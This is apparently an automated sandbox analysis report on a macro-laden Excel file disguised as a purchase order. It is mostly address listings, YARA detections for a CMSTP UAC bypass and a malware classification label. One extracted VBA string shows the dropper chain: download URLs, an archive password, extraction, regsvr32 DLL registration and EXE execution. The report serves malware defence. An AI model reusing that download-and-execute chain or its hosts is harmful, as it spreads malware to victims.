                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEDB44012_2_00007FFC9CEDB440
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEFB3A012_2_00007FFC9CEFB3A0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4CDC012_2_00007FFC9CF4CDC0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA8E4012_2_00007FFC9CEA8E40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4ACC012_2_00007FFC9CF4ACC0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF54EB012_2_00007FFC9CF54EB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF3EEE012_2_00007FFC9CF3EEE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF6090012_2_00007FFC9CF60900
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEDAB3012_2_00007FFC9CEDAB30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4EC2012_2_00007FFC9CF4EC20
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF14AE012_2_00007FFC9CF14AE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEB850012_2_00007FFC9CEB8500
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEAE5A012_2_00007FFC9CEAE5A0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEE277012_2_00007FFC9CEE2770
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CECC75612_2_00007FFC9CECC756
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF3C7A012_2_00007FFC9CF3C7A0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEF61C012_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEDE14012_2_00007FFC9CEDE140
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEE012012_2_00007FFC9CEE0120
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4826012_2_00007FFC9CF48260
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEF61C012_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF502B012_2_00007FFC9CF502B0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF1430012_2_00007FFC9CF14300
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA83D012_2_00007FFC9CEA83D0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001197016_2_0000000140011970
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140023B7016_2_0000000140023B70
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400276B016_2_00000001400276B0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140023FF016_2_0000000140023FF0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400137F016_2_00000001400137F0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400058E016_2_00000001400058E0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014000D96016_2_000000014000D960
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014000E96016_2_000000014000E960
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001E98016_2_000000014001E980
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400311C416_2_00000001400311C4
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400149E016_2_00000001400149E0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003021C16_2_000000014003021C
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400162A016_2_00000001400162A0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140012B7016_2_0000000140012B70
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003538C16_2_000000014003538C
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140023BE616_2_0000000140023BE6
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140036C5816_2_0000000140036C58
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014000AC7016_2_000000014000AC70
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002E48C16_2_000000014002E48C
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014000FCA016_2_000000014000FCA0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400374BC16_2_00000001400374BC
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002B57C16_2_000000014002B57C
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001DDD016_2_000000014001DDD0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140016E1016_2_0000000140016E10
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001BE4016_2_000000014001BE40
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001B65016_2_000000014001B650
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001DE5116_2_000000014001DE51
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140017E7016_2_0000000140017E70
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014001C68016_2_000000014001C680
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014000A6C016_2_000000014000A6C0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140010ED016_2_0000000140010ED0
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140037F6816_2_0000000140037F68
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FF6E44A7ED028_2_00007FF6E44A7ED0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FF6E44A57C028_2_00007FF6E44A57C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FF6E44A43E028_2_00007FF6E44A43E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBBBCEE28_2_00007FFC9CBBBCEE
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC2FC8028_2_00007FFC9CC2FC80
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBE9ED628_2_00007FFC9CBE9ED6
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBB3E9F28_2_00007FFC9CBB3E9F
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBFBFF028_2_00007FFC9CBFBFF0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC2B90028_2_00007FFC9CC2B900
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC65A2028_2_00007FFC9CC65A20
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC5F9A028_2_00007FFC9CC5F9A0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC4FB4028_2_00007FFC9CC4FB40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC5DC6028_2_00007FFC9CC5DC60
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC714B028_2_00007FFC9CC714B0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBE165628_2_00007FFC9CBE1656
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBF362028_2_00007FFC9CBF3620
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC5D5C028_2_00007FFC9CC5D5C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC5F5C028_2_00007FFC9CC5F5C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBBB5E728_2_00007FFC9CBBB5E7
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBC786028_2_00007FFC9CBC7860
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBCF78028_2_00007FFC9CBCF780
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC5F24028_2_00007FFC9CC5F240
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC2D28028_2_00007FFC9CC2D280
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBCEE6028_2_00007FFC9CBCEE60
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBC8E7228_2_00007FFC9CBC8E72
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC5EF4028_2_00007FFC9CC5EF40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBCEF6028_2_00007FFC9CBCEF60
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBC4A4028_2_00007FFC9CBC4A40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC60C5028_2_00007FFC9CC60C50
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC28BE028_2_00007FFC9CC28BE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBC464028_2_00007FFC9CBC4640
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBBE76028_2_00007FFC9CBBE760
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC2882028_2_00007FFC9CC28820
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC667D028_2_00007FFC9CC667D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBE67E028_2_00007FFC9CBE67E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CCCE12028_2_00007FFC9CCCE120
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC0C25028_2_00007FFC9CC0C250
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CC6233028_2_00007FFC9CC62330
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9BD6028_2_00007FFC9CE9BD60
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE07D4028_2_00007FFC9CE07D40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE05D8028_2_00007FFC9CE05D80
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF98C028_2_00007FFC9CDF98C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF39DF28_2_00007FFC9CDF39DF
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE179C028_2_00007FFC9CE179C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE31B4028_2_00007FFC9CE31B40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE2DAC028_2_00007FFC9CE2DAC0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9B58028_2_00007FFC9CE9B580
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE2B6E028_2_00007FFC9CE2B6E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE0186028_2_00007FFC9CE01860
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF380028_2_00007FFC9CDF3800
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE297DD28_2_00007FFC9CE297DD
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9522028_2_00007FFC9CE95220
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE8D22028_2_00007FFC9CE8D220
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE0736028_2_00007FFC9CE07360
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CF0D28028_2_00007FFC9CF0D280
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE0746028_2_00007FFC9CE07460
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE2B44028_2_00007FFC9CE2B440
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9740028_2_00007FFC9CE97400
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE4B3A028_2_00007FFC9CE4B3A0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9ACC028_2_00007FFC9CE9ACC0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF8E4028_2_00007FFC9CDF8E40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9CDC028_2_00007FFC9CE9CDC0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE8EEE028_2_00007FFC9CE8EEE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CEA4EB028_2_00007FFC9CEA4EB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CEB090028_2_00007FFC9CEB0900
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE2AB3028_2_00007FFC9CE2AB30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE64AE028_2_00007FFC9CE64AE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9EC2028_2_00007FFC9CE9EC20
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE0850028_2_00007FFC9CE08500
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDFE5A028_2_00007FFC9CDFE5A0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE3277028_2_00007FFC9CE32770
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE1C75628_2_00007FFC9CE1C756
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE461C028_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE8C7A028_2_00007FFC9CE8C7A0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE2E14028_2_00007FFC9CE2E140
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE3012028_2_00007FFC9CE30120
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE9826028_2_00007FFC9CE98260
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE461C028_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE6430028_2_00007FFC9CE64300
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CEA02B028_2_00007FFC9CEA02B0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF83D028_2_00007FFC9CDF83D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 33_2_00007FF6E44A7ED033_2_00007FF6E44A7ED0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 33_2_00007FF6E44A57C033_2_00007FF6E44A57C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 33_2_00007FF6E44A43E033_2_00007FF6E44A43E0
                          Source: PO202503D.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: PO202503D.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Workbook_OpenName: Workbook_Open
                          Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                          Source: PO202503D.xlsmOLE indicator, VBA macros: true
                          Source: PO202503D.xlsmStream path 'VBA/__SRP_0' : https://tursiian.com/7z.txt$7zip_installer.exe/S47-Zip installation failed!8ZIP file failed to download!2(7-Zip installed at:* 7-Zip found at:,$PO202502SNAKWS.zip"|https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zi|&ZIP downloaded to:* x -p123456 -y -oba).a(Extraction command:$*.*"Extracted files:$,,libcares-2.dll"nasrallah_x86.dll vcruntime210.dll$PO202502SNAKWS.exe"-#Z00:00:010c.EXE execution attempted.aFF!1Q1&mQ1@nasrallah_x86.dll not found at:*WScript.Shell2QRetry(: DLL exists=, EXE exists=:libcares-2.dll not found at: 6msvcp290.dll not found at:$@2iw<WYl|>vcruntime210.dll not found at: >PO202502SNAK.exe not found at:* Files verified:$ and(regsvr32.exe/s.2DLL registration output: LDLL registration attempted (no output)EXE output:"Run<Z>Z"Cleanup c
                          Source: ~DFE94CD9633EB51867.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe A52E245DD7937094711B10C479274A2CCCEA2DFB89F7D4C9F22879214718F92B
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\SystemRootDoc\PO202502DAKE.exe A52E245DD7937094711B10C479274A2CCCEA2DFB89F7D4C9F22879214718F92B
                          Source: C:\Program Files\7-Zip\7z.exeProcess token adjusted: SecurityJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CEA1280 appears 1076 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CD85750 appears 210 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CFC4440 appears 317 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CF5E0B0 appears 67 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CD852E0 appears 212 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CFC4AEE appears 314 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CD85330 appears 326 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CFC4490 appears 436 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CF5CE80 appears 1077 times
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: String function: 00007FFC9CD1EC60 appears 68 times
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: String function: 0000000140039058 appears 34 times
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: String function: 0000000140029E0C appears 49 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CEACE80 appears 1077 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CDF1280 appears 1076 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CF14440 appears 317 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CCD52E0 appears 317 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CEAE0B0 appears 67 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CCD5330 appears 436 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CF14AEE appears 314 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CC6EC60 appears 67 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CF14490 appears 436 times
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: String function: 00007FFC9CCD5750 appears 314 times
                          Source: PO202502DAKE.exe.9.drStatic PE information: Number of sections : 11 > 10
                          Source: PO202502DAKE.exe.12.drStatic PE information: Number of sections : 11 > 10
                          Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@29/22@12/3
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC677E0 SetLastError,FormatMessageW,GetLastError,SetLastError,FormatMessageW,GetLastError,12_2_00007FFC9CC677E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC69420 SetLastError,AdjustTokenPrivileges,GetLastError,12_2_00007FFC9CC69420
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CBB9420 SetLastError,AdjustTokenPrivileges,GetLastError,28_2_00007FFC9CBB9420
